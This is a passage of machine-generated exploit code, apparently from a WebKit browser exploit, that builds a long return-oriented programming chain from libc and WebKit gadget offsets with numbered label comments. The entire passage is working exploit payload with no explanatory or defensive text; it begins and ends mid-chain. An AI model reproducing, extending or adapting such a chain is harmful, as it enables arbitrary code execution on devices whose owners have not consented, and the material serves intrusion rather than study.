libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+250480, //L4586 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+250496, //L4587 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4586: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4587: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+250672, //L4589 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+250688, //L4590 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+250656, //L4588 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4588: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4589: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4590: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+250832, //L4593 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+250848, //L4594 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+250800, //L4591 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4591: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4592: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4593: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4594: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+250920, //L4595 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4595: db([0, 0]); // 0x0 //L4567: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+251048, //L4598 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+251064, //L4599 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+251032, //L4597 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4597: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4598: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4599: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+251176, //L4601 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+251224, //L4604 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+251192, //L4602 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4601: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4602: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4603: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4604: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+251336, //L4605+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+251328, //L4605 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4605: db([0, 0]); // 0x0 set_gadgets([ ropchain+251352, //L4605+24 ropchain+253376, //L4600 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+251392, //L4606 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4606: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4607: db([88, 0]); // 0x58 set_gadget(libc_base+144605,); //pop rdi //L4608: db([88, 0]); // 0x58 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+251584, //L4612 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+251552, //L4610 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+251568, //L4611 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4609: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L4610: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4611: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4612: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+251640, //L4614 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L4614: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+251768, //L4616 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+251784, //L4617 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+251752, //L4615 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4615: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4616: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4617: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+251880, //L4619 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+251864, //L4618 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4618: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4619: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+251960, //L4620 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4620: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4622: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+252080, //L4625 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+252064, //L4623 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4623: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4625: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+252224, //L4628 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+252192, //L4626 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+252208, //L4627 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4626: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4627: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4628: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+252296, //L4630 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4630: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+252352, //L4631 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4631: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+252432, //L4633 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4633: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4635: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+252552, //L4638 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+252536, //L4636 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4636: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4638: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+252696, //L4641 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+252664, //L4639 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+252680, //L4640 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4639: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4640: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4641: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+252784, //L4643 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L4642: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L4643: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+252840, //L4644 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4644: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4646: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+252920, //L4648 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4648: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+253024, //L4649 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+253040, //L4650 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4649: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4650: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+253128, //L4652 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4652: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+253184, //L4653 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4653: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+253256, //L4656 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4656: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+253312, //L4657 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4657: db([0, 0]); // 0x0 set_gadgets([ webkit_base+1121481, //mov [rax], cl libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+782311, //pop rsp ropchain+258080, //L4659 //L4600: libc_base+764760, //pop rsi ropchain+253416, //L4660 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4660: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4662: db([72, 0]); // 0x48 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+253536, //L4665 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+253520, //L4663 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4663: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4665: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+253712, //L4668 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+253728, //L4669 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+253680, //L4666 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+253696, //L4667 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4666: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4667: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4668: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4669: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+253888, //L4673 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+253856, //L4671 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+253872, //L4672 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4670: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4671: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4672: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4673: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+253992, //L4675 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+253976, //L4674 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4674: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4675: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+254088, //L4677 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4676: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4677: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4678: db([2, 0]); // 0x2 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+254192, //L4679 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+254208, //L4680 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4679: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4680: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+254376, //L4682 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+254392, //L4683 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+254360, //L4681 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4681: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4682: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4683: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+254552, //L4688 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+254568, //L4689 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+254504, //L4685 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4685: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4686: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4687: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4688: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4689: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+254680, //L4690+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+254672, //L4690 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4690: db([0, 0]); // 0x0 set_gadgets([ ropchain+254696, //L4690+24 ropchain+255648, //L4684 libc_base+764760, //pop rsi ropchain+254736, //L4691 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4691: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4693: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+254856, //L4696 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+254840, //L4694 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4694: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4696: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+255000, //L4699 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+254968, //L4697 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+254984, //L4698 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4697: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4698: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4699: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+255096, //L4701 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4700: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4701: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4702: db([32, 0]); // 0x20 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+255200, //L4703 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+255216, //L4704 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4703: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4704: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+255392, //L4706 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+255408, //L4707 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+255376, //L4705 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4705: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4706: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4707: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+255552, //L4710 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+255568, //L4711 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+255520, //L4708 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4708: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4709: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4710: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4711: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+255640, //L4712 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4712: db([0, 0]); // 0x0 //L4684: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+255768, //L4715 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+255784, //L4716 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+255752, //L4714 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4714: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4715: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4716: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+255896, //L4718 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+255944, //L4721 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+255912, //L4719 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4718: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4719: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4720: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4721: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+256056, //L4722+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+256048, //L4722 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4722: db([0, 0]); // 0x0 set_gadgets([ ropchain+256072, //L4722+24 ropchain+258080, //L4717 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+256112, //L4723 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4723: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4724: db([98, 0]); // 0x62 set_gadget(libc_base+144605,); //pop rdi //L4725: db([98, 0]); // 0x62 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+256304, //L4729 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+256272, //L4727 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+256288, //L4728 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4726: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L4727: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4728: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4729: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+256360, //L4731 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L4731: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+256488, //L4733 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+256504, //L4734 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+256472, //L4732 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4732: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4733: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4734: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+256600, //L4736 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+256584, //L4735 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4735: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4736: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 